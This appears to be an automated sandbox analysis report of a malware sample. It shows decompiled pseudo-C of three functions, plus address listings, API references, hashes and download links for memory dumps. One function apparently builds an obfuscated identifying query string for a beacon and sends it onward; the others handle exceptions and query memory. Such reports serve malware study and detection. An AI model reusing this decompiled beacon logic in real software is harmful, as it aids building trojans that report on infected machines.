                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID:
                                                                                  • API String ID: 2221118986-0
                                                                                  • Opcode ID: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
                                                                                  • Instruction ID: aad35203a69e6e6d33e91efb97d0c7fed23f5fabba914e7b226a3c963d82b7f1
                                                                                  • Opcode Fuzzy Hash: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
                                                                                  • Instruction Fuzzy Hash: 4122747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033FB159, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033FB159(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x33fd290; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x33fd2d8 = 1;
										__eflags =  *0x33fd2d8;
										if( *0x33fd2d8 != 0) {
											goto L60;
										}
										_t84 =  *0x33fd290; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x33fd2d8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x33fd290 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x33fd298 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x33fd294 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x33fd298 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x33fd298 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x33fd2d8 = 1;
							__eflags =  *0x33fd2d8;
							if( *0x33fd2d8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x33fd298 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x33fd298 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x33fd2d8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x33fd298 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x33fd290 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x33fd298 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x33fd298 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                  0x033fb163
                                                                                  0x033fb166
                                                                                  0x033fb16c
                                                                                  0x033fb18a
                                                                                  0x00000000
                                                                                  0x033fb18a
                                                                                  0x033fb174
                                                                                  0x033fb17d
                                                                                  0x033fb183
                                                                                  0x033fb192
                                                                                  0x033fb195
                                                                                  0x033fb198
                                                                                  0x033fb1a2
                                                                                  0x033fb1a2
                                                                                  0x033fb1a4
                                                                                  0x033fb1a7
                                                                                  0x033fb1a9
                                                                                  0x033fb1a9
                                                                                  0x033fb1ab
                                                                                  0x033fb1ae
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb1b0
                                                                                  0x033fb1b2
                                                                                  0x033fb218
                                                                                  0x033fb218
                                                                                  0x033fb376
                                                                                  0x00000000
                                                                                  0x033fb376
                                                                                  0x033fb1b4
                                                                                  0x033fb1b4
                                                                                  0x033fb1b8
                                                                                  0x033fb1ba
                                                                                  0x033fb1ba
                                                                                  0x033fb1ba
                                                                                  0x033fb1ba
                                                                                  0x033fb1bd
                                                                                  0x033fb1be
                                                                                  0x033fb1c1
                                                                                  0x033fb1c1
                                                                                  0x033fb1c5
                                                                                  0x033fb1c9
                                                                                  0x033fb1d7
                                                                                  0x033fb1d7
                                                                                  0x033fb1df
                                                                                  0x033fb1e5
                                                                                  0x033fb1e7
                                                                                  0x033fb1e9
                                                                                  0x033fb1f9
                                                                                  0x033fb206
                                                                                  0x033fb20a
                                                                                  0x033fb20f
                                                                                  0x033fb211
                                                                                  0x033fb28f
                                                                                  0x033fb28f
                                                                                  0x033fb213
                                                                                  0x033fb213
                                                                                  0x033fb213
                                                                                  0x033fb291
                                                                                  0x033fb293
                                                                                  0x033fb374
                                                                                  0x033fb374
                                                                                  0x00000000
                                                                                  0x033fb299
                                                                                  0x033fb299
                                                                                  0x033fb2a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2a6
                                                                                  0x033fb2aa
                                                                                  0x033fb306
                                                                                  0x033fb308
                                                                                  0x033fb310
                                                                                  0x033fb312
                                                                                  0x033fb314
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb316
                                                                                  0x033fb31c
                                                                                  0x033fb31e
                                                                                  0x033fb320
                                                                                  0x033fb335
                                                                                  0x033fb335
                                                                                  0x033fb337
                                                                                  0x033fb366
                                                                                  0x033fb36d
                                                                                  0x00000000
                                                                                  0x033fb36d
                                                                                  0x033fb33b
                                                                                  0x033fb33c
                                                                                  0x033fb33e
                                                                                  0x033fb340
                                                                                  0x033fb340
                                                                                  0x033fb342
                                                                                  0x033fb344
                                                                                  0x033fb346
                                                                                  0x033fb35a
                                                                                  0x033fb35a
                                                                                  0x033fb35d
                                                                                  0x033fb35f
                                                                                  0x033fb35f
                                                                                  0x033fb360
                                                                                  0x033fb360
                                                                                  0x00000000
                                                                                  0x033fb348
                                                                                  0x033fb348
                                                                                  0x033fb348
                                                                                  0x033fb351
                                                                                  0x033fb352
                                                                                  0x033fb354
                                                                                  0x033fb356
                                                                                  0x033fb356
                                                                                  0x00000000
                                                                                  0x033fb348
                                                                                  0x033fb346
                                                                                  0x033fb322
                                                                                  0x033fb329
                                                                                  0x033fb329
                                                                                  0x033fb32b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb32d
                                                                                  0x033fb32e
                                                                                  0x033fb331
                                                                                  0x033fb333
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb333
                                                                                  0x00000000
                                                                                  0x033fb329
                                                                                  0x033fb2ac
                                                                                  0x033fb2af
                                                                                  0x033fb2b4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2bd
                                                                                  0x033fb2bf
                                                                                  0x033fb2c5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2cb
                                                                                  0x033fb2d1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2d7
                                                                                  0x033fb2d9
                                                                                  0x033fb2e2
                                                                                  0x033fb2e6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2ec
                                                                                  0x033fb2ef
                                                                                  0x033fb2f1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2f8
                                                                                  0x033fb2fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb2fc
                                                                                  0x033fb300
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb300
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb1eb
                                                                                  0x033fb1eb
                                                                                  0x033fb1eb
                                                                                  0x033fb1f2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb1f4
                                                                                  0x033fb1f5
                                                                                  0x033fb1f7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb1f7
                                                                                  0x033fb21f
                                                                                  0x033fb221
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb231
                                                                                  0x033fb233
                                                                                  0x033fb235
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb23b
                                                                                  0x033fb242
                                                                                  0x033fb26e
                                                                                  0x033fb26e
                                                                                  0x033fb270
                                                                                  0x033fb272
                                                                                  0x033fb286
                                                                                  0x033fb288
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb274
                                                                                  0x033fb274
                                                                                  0x033fb274
                                                                                  0x033fb27d
                                                                                  0x033fb27e
                                                                                  0x033fb280
                                                                                  0x033fb282
                                                                                  0x033fb282
                                                                                  0x00000000
                                                                                  0x033fb274
                                                                                  0x033fb244
                                                                                  0x033fb244
                                                                                  0x033fb247
                                                                                  0x033fb249
                                                                                  0x033fb25b
                                                                                  0x033fb25b
                                                                                  0x033fb25e
                                                                                  0x033fb260
                                                                                  0x033fb260
                                                                                  0x033fb261
                                                                                  0x033fb261
                                                                                  0x033fb267
                                                                                  0x033fb267
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb24b
                                                                                  0x033fb24b
                                                                                  0x033fb24b
                                                                                  0x033fb252
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb254
                                                                                  0x033fb254
                                                                                  0x033fb255
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb255
                                                                                  0x033fb257
                                                                                  0x033fb259
                                                                                  0x033fb26c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb26c
                                                                                  0x00000000
                                                                                  0x033fb259
                                                                                  0x033fb1cb
                                                                                  0x033fb1ce
                                                                                  0x033fb1d1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb1d3
                                                                                  0x033fb1d5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033fb1d5
                                                                                  0x033fb19a
                                                                                  0x033fb19c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 033FB20A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: MemoryQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2850889275-0
                                                                                  • Opcode ID: 70ac8f7000da4547c5ee5408e2c3768b32c333056c9d283520a5c337137eba20
                                                                                  • Instruction ID: f49d435415c0caacc71cb618647f820abf976ccec4cec8e454dfd1ab21005979
                                                                                  • Opcode Fuzzy Hash: 70ac8f7000da4547c5ee5408e2c3768b32c333056c9d283520a5c337137eba20
                                                                                  • Instruction Fuzzy Hash: D161E8B4A50206EFDB19DF28CCC462DF3AAEB45354FEC8269D646CB298E770D941C780
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033FAF34, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 71%
                                                                                  			E033FAF34(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E033FB09F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E033FB159(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E033FB044(_t55, _t66);
										_t89 = _t66 + 0x10;
										E033FB09F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E033FB13B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                  0x033faf38
                                                                                  0x033faf39
                                                                                  0x033faf3a
                                                                                  0x033faf3d
                                                                                  0x033faf3f
                                                                                  0x033faf42
                                                                                  0x033faf43
                                                                                  0x033faf45
                                                                                  0x033faf46
                                                                                  0x033faf47
                                                                                  0x033faf4a
                                                                                  0x033faf54
                                                                                  0x033fb005
                                                                                  0x033fb00c
                                                                                  0x033fb015
                                                                                  0x033faf5a
                                                                                  0x033faf5a
                                                                                  0x033faf60
                                                                                  0x033faf66
                                                                                  0x033faf69
                                                                                  0x033faf6c
                                                                                  0x033faf70
                                                                                  0x033faf75
                                                                                  0x033faf7a
                                                                                  0x033faffa
                                                                                  0x00000000
                                                                                  0x033faf7c
                                                                                  0x033faf7c
                                                                                  0x033faf88
                                                                                  0x033faf8a
                                                                                  0x033fafe5
                                                                                  0x033fafe5
                                                                                  0x033fafeb
                                                                                  0x00000000
                                                                                  0x033faf8c
                                                                                  0x033faf9b
                                                                                  0x033faf9d
                                                                                  0x033faf9e
                                                                                  0x033faf9f
                                                                                  0x033fafa2
                                                                                  0x033fafa2
                                                                                  0x033fafa4
                                                                                  0x00000000
                                                                                  0x033fafa6
                                                                                  0x033fafa6
                                                                                  0x033faff0
                                                                                  0x033fafa8
                                                                                  0x033fafa8
                                                                                  0x033fafac
                                                                                  0x033fafb4
                                                                                  0x033fafb9
                                                                                  0x033fafbe
                                                                                  0x033fafca
                                                                                  0x033fafd2
                                                                                  0x033fafd9
                                                                                  0x033fafdf
                                                                                  0x033fafe3
                                                                                  0x00000000
                                                                                  0x033fafe3
                                                                                  0x033fafa6
                                                                                  0x033fafa4
                                                                                  0x00000000
                                                                                  0x033faf8a
                                                                                  0x033faffe
                                                                                  0x033faffe
                                                                                  0x033faffe
                                                                                  0x033faf7a
                                                                                  0x033fb01a
                                                                                  0x033fb021

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                  • Instruction ID: 8f64dbc60573710c56c69e04504362ded0dd6d17dff83dc78786e0eca8dfb37a
                                                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                  • Instruction Fuzzy Hash: 302177B69043059FC714EF68CCC0967F7A5BF44350B498168DA5A9F245E734F915CBE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F6A9C, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 70%
                                                                                  			E033F6A9C(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x33fd1f0, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x33fd018; // 0xd08e8e1d
					asm("bswap eax");
					_t32 =  *0x33fd014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x33fd010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x33fd00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0x33fd230; // 0x2b2a5a8
					_t2 = _t35 + 0x33fe622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d144, _t34, _t33, _t32, _t31,  *0x33fd02c,  *0x33fd004, _t110);
					_t38 = E033F7C34();
					_t39 =  *0x33fd230; // 0x2b2a5a8
					_t3 = _t39 + 0x33fe662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x33fd230; // 0x2b2a5a8
						_t7 = _t92 + 0x33fe66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E033F5728(_t99);
					_t44 =  *0x33fd230; // 0x2b2a5a8
					_t9 = _t44 + 0x33fe38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x33fd230; // 0x2b2a5a8
					_t11 = _t48 + 0x33fe33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x33fd288; // 0x5f295b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x33fd230; // 0x2b2a5a8
						_t13 = _t88 + 0x33fe685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x33fd2dc; // 0x5f29630
					_a28 = E033F8A9B(0x33fd00a, _t105 + 4);
					_t55 =  *0x33fd278; // 0x5f295e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x33fd230; // 0x2b2a5a8
						_t16 = _t84 + 0x33fe8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x33fd274; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x33fd230; // 0x2b2a5a8
						_t18 = _t81 + 0x33fe8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x33fd1f0, _t107, 0x800);
						if(_t98 != _t107) {
							E033F7C61(GetTickCount());
							_t62 =  *0x33fd2dc; // 0x5f29630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x33fd2dc; // 0x5f29630
							__imp__(_t66 + 0x40);
							_t68 =  *0x33fd2dc; // 0x5f29630
							_t115 = E033F140D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x33fc2c4);
								_push(_t115);
								_t108 = E033F74AF();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E033F4644(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E033F53A8();
									}
									HeapFree( *0x33fd1f0, 0, _v24);
								}
								HeapFree( *0x33fd1f0, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x33fd1f0, _t107, _t98);
						}
						HeapFree( *0x33fd1f0, _t107, _a20);
					}
					HeapFree( *0x33fd1f0, _t107, _t117);
				}
				return _v16;
			}





















































                                                                                  0x033f6a9c
                                                                                  0x033f6ab0
                                                                                  0x033f6ab2
                                                                                  0x033f6ac0
                                                                                  0x033f6ac4
                                                                                  0x033f6acc
                                                                                  0x033f6ad4
                                                                                  0x033f6ad4
                                                                                  0x033f6ad6
                                                                                  0x033f6ae2
                                                                                  0x033f6af1
                                                                                  0x033f6af6
                                                                                  0x033f6af9
                                                                                  0x033f6afe
                                                                                  0x033f6b01
                                                                                  0x033f6b06
                                                                                  0x033f6b09
                                                                                  0x033f6b15
                                                                                  0x033f6b22
                                                                                  0x033f6b24
                                                                                  0x033f6b2a
                                                                                  0x033f6b2f
                                                                                  0x033f6b3a
                                                                                  0x033f6b3c
                                                                                  0x033f6b3f
                                                                                  0x033f6b45
                                                                                  0x033f6b47
                                                                                  0x033f6b50
                                                                                  0x033f6b5b
                                                                                  0x033f6b5d
                                                                                  0x033f6b60
                                                                                  0x033f6b60
                                                                                  0x033f6b62
                                                                                  0x033f6b69
                                                                                  0x033f6b6e
                                                                                  0x033f6b7b
                                                                                  0x033f6b7d
                                                                                  0x033f6b82
                                                                                  0x033f6b90
                                                                                  0x033f6b92
                                                                                  0x033f6b97
                                                                                  0x033f6b9c
                                                                                  0x033f6b9f
                                                                                  0x033f6ba4
                                                                                  0x033f6baf
                                                                                  0x033f6bb1
                                                                                  0x033f6bb4
                                                                                  0x033f6bb4
                                                                                  0x033f6bb6
                                                                                  0x033f6bc9
                                                                                  0x033f6bcd
                                                                                  0x033f6bd2
                                                                                  0x033f6bd6
                                                                                  0x033f6bd9
                                                                                  0x033f6bde
                                                                                  0x033f6be9
                                                                                  0x033f6beb
                                                                                  0x033f6bee
                                                                                  0x033f6bee
                                                                                  0x033f6bf0
                                                                                  0x033f6bf7
                                                                                  0x033f6bfa
                                                                                  0x033f6bff
                                                                                  0x033f6c09
                                                                                  0x033f6c0b
                                                                                  0x033f6c12
                                                                                  0x033f6c2a
                                                                                  0x033f6c2e
                                                                                  0x033f6c3a
                                                                                  0x033f6c3f
                                                                                  0x033f6c48
                                                                                  0x033f6c59
                                                                                  0x033f6c5d
                                                                                  0x033f6c66
                                                                                  0x033f6c6c
                                                                                  0x033f6c79
                                                                                  0x033f6c86
                                                                                  0x033f6c8c
                                                                                  0x033f6c94
                                                                                  0x033f6c9a
                                                                                  0x033f6ca0
                                                                                  0x033f6ca4
                                                                                  0x033f6ca8
                                                                                  0x033f6cae
                                                                                  0x033f6cb2
                                                                                  0x033f6cb9
                                                                                  0x033f6cc0
